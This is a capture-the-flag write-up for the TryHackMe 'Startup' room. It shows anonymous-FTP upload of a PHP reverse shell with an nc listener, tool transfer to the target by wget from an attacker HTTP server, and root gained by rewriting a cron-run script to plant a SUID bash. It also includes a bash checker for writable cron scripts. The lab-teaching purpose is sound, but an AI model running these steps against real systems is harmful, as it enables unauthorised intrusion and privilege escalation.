Startup v1.3 — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Startup v1.3 — TryHackMe — WriteUp. Check it out!
First, deploy the machine and scan it with nmap for open ports.
nmap -A -T5 -v <ip>
As FTP is open and allows anonymous login, let's try to read what is inside it.
Now I know a name: Maya. Maybe it will be useful later for SSH or for logging in somewhere. That's all for FTP; I moved around to find more but found nothing valuable.
Let’s now access the website via port 80.
It’s always a good habit to check Page source:
Well, the only thing we learn is that this page needs to be updated. Let's use gobuster to check for hidden directories.
gobuster dir -u http://<ip>/ -w /path-to-wordlist
Well, there's only a "files" folder. Let's access it.
It contains the same files as the FTP share, which means that if we upload a reverse shell via FTP, we can reach it through the web server and get our shell!
Log in to FTP again, cd to ftp and upload the shell:
put php-reverse-shell.php
Success! Now go back to /files and trigger our shell.
Start a listener on your machine
nc -lvnp 1234
Then click shell.php (the uploaded PHP file).
Spawn a proper TTY with python:
python -c 'import pty; pty.spawn("/bin/bash")'
Find our recipe (quote the glob so the shell does not expand it in the current directory):
find / -name "*.txt" 2>/dev/null
Now I know the 1st recipe, which is ❤
Let's get LinEnum.sh and transfer it to the target machine.
You can get it here:
https://github.com/rebootuser/LinEnum
Then start a http server on your machine:
python3 -m http.server 9000
Or if you use python2:
python2 -m SimpleHTTPServer 9000
Then, from the shell on the target, cd to /tmp and:
wget http://<your-vpn-ip>:9000/LinEnum.sh
Then run LinEnum:
./LinEnum.sh -r report -e /tmp -t
After a while, you will see:
Well, let’s take a look at those folders.
There is a packet capture here. Get it to our machine and inspect it.
This time, start the HTTP server on the target and wget the file from your machine.
The file has been transferred. Now open it in Wireshark to find the data inside. Follow the TCP stream and:
Looks like an attacker entered this machine before. We get a string: c4ntg3t3n0ughsp1c3
Maybe it’s a password for a user?
Go back to the target machine and look for users with a login shell:
grep /bin/bash /etc/passwd
Well, there are only 2 users with bash: root and vagrant. Let's try to log in as vagrant and root using the above string.
Well, we cannot log in as any user using that password. However, look back at /home: you see a folder called "lennie". Try to su to her with it.
Success! Now get our 1st flag.
Now let's own root to get our final flag. Download pspy32, which can be used to snoop on Linux processes without root privileges, and transfer it to the target machine. Again use python and wget.
You can download it here:
chmod +x pspy32
Then execute it.
You can see that every minute it runs a script called planner.sh.
Look at the hint: 'Scripts…'. There is a folder called "scripts", so let's look at it.
Well, there is a script called "planner" and a txt file. What the script does is print the $LIST variable to the txt file and then execute /etc/print.sh. Both files here belong to root, so we cannot modify them. However, /etc/print.sh is writable by us (ls -l /etc/print.sh shows it), and root's cron job executes it every minute!
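The check above (root's cron script is untouchable, but a script it calls is ours) is easy to miss when done by eye. The following bash is an added example, not part of the original writeup: it walks a crontab, collects the absolute paths each entry runs and the paths those scripts call in turn, and reports which of them a given uid/gid could write. It decides writability from owner and mode bits rather than test -w, so the answer is about the user you ask for even if you run it as root. The fixture at the bottom is constructed here to mirror the room's layout (planner.sh writing a list file and calling /etc/print.sh); the uid 99999 and the world-writable bit on print.sh are stand-ins, since we cannot chown to lennie in a demo.

```bash
#!/bin/bash
# Added example (not from the original writeup): enumerate the scripts a
# crontab runs, plus the scripts those scripts call, and report which of them
# a given user could write. Fixture below is constructed; names only mirror the room.

# Every whitespace-separated token in $1 that is an absolute path.
abs_paths() {
    tr -s ' \t;|&' '\n' < "$1" | grep '^/' | sort -u
}

# writable_by FILE UID "GID GID ..." : returns 0 if that uid/gids could write FILE.
# Decided from owner and mode bits rather than `test -w`, so the answer is
# about the user asked for, not whoever runs the check (root can write anything).
writable_by() {
    local f=$1 uid=$2 gids=$3 info owner group mode ub gb ob g
    info=$(stat -c '%u %g %a' "$f" 2>/dev/null || stat -f '%u %g %Lp' "$f") || return 1
    set -- $info
    owner=$1 group=$2
    mode=$(printf '%s' "$3" | tail -c 3)          # drop the setuid/setgid/sticky digit
    ub=$(printf '%s' "$mode" | cut -c1)           # owner bits
    gb=$(printf '%s' "$mode" | cut -c2)           # group bits
    ob=$(printf '%s' "$mode" | cut -c3)           # other bits
    [ "$owner" = "$uid" ] && [ $(( ub & 2 )) -ne 0 ] && return 0
    for g in $gids; do
        [ "$group" = "$g" ] && [ $(( gb & 2 )) -ne 0 ] && return 0
    done
    [ $(( ob & 2 )) -ne 0 ]
}

# writable_cron_scripts CRONTAB UID "GID ..." : cron-reachable files that user can write.
# On a real target: writable_cron_scripts /etc/crontab "$(id -u)" "$(id -G)"
writable_cron_scripts() {
    local crontab=$1 uid=$2 gids=$3 path inner
    for path in $(abs_paths "$crontab"); do
        [ -f "$path" ] || continue
        writable_by "$path" "$uid" "$gids" && echo "$path"
        [ -r "$path" ] || continue
        # one level down: paths invoked from inside the cron script itself
        for inner in $(abs_paths "$path"); do
            [ -f "$inner" ] && writable_by "$inner" "$uid" "$gids" && echo "$inner"
        done
    done | sort -u
}

# Constructed fixture: a root crontab entry running planner.sh, which writes a
# list file and then calls /etc/print.sh. We cannot chown in a demo, so print.sh
# is made world-writable to stand in for "owned by the low-privileged user".
FIXTURE=$(mktemp -d)
mkdir -p "$FIXTURE/home/lennie/scripts" "$FIXTURE/etc"
cat > "$FIXTURE/home/lennie/scripts/planner.sh" <<EOF
#!/bin/bash
echo \$LIST > $FIXTURE/home/lennie/scripts/startup_list.txt
$FIXTURE/etc/print.sh
EOF
: > "$FIXTURE/home/lennie/scripts/startup_list.txt"
printf '#!/bin/bash\necho "Done"\n' > "$FIXTURE/etc/print.sh"
printf '* * * * * root %s\n' "$FIXTURE/home/lennie/scripts/planner.sh" > "$FIXTURE/crontab"
chmod 644 "$FIXTURE/home/lennie/scripts/planner.sh" "$FIXTURE/home/lennie/scripts/startup_list.txt"
chmod 666 "$FIXTURE/etc/print.sh"

# Ask on behalf of a uid/gid that owns none of the files (99999 is arbitrary):
# only the world-writable print.sh should come back.
writable_cron_scripts "$FIXTURE/crontab" 99999 99999
```

Run it on the target with your own uid and groups against /etc/crontab (and any files under /etc/cron.d) to get the same answer the page reaches by hand: planner.sh is root's, the print.sh it calls is not. It only follows one level of calls and only literal absolute paths, so a script that builds its command from variables or relative paths still needs a manual look.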
So, let’s modify the content of this script to get root.
cat > /etc/print.sh <<EOF
#!/bin/bash
echo "Done"
cp /bin/bash /tmp/bash
chmod 4755 /tmp/bash
EOF
What am I doing here? I copy the original /bin/bash to /tmp/bash and set the SUID bit on it. Because the cron job runs as root, the copy is owned by root and can be executed with root's privileges. Wait a minute for the cron job to run, then check /tmp:
ls -la /tmp/bash
NOTE:
If you get the error "text file busy", the cat command is still holding /etc/print.sh open for writing, which stops planner.sh from executing it. Run this command to get the PID of the cat process:
lsof /etc/print.sh
and then run:
kill <pid>
Now just exec that bash and I’m root!
/tmp/bash -p
*Remember the -p flag: it tells bash to keep the effective UID granted by the SUID bit. Without -p, bash drops it back to your real UID and you're still lennie!
Now get our final flag.
The end.
HAPPY HACKING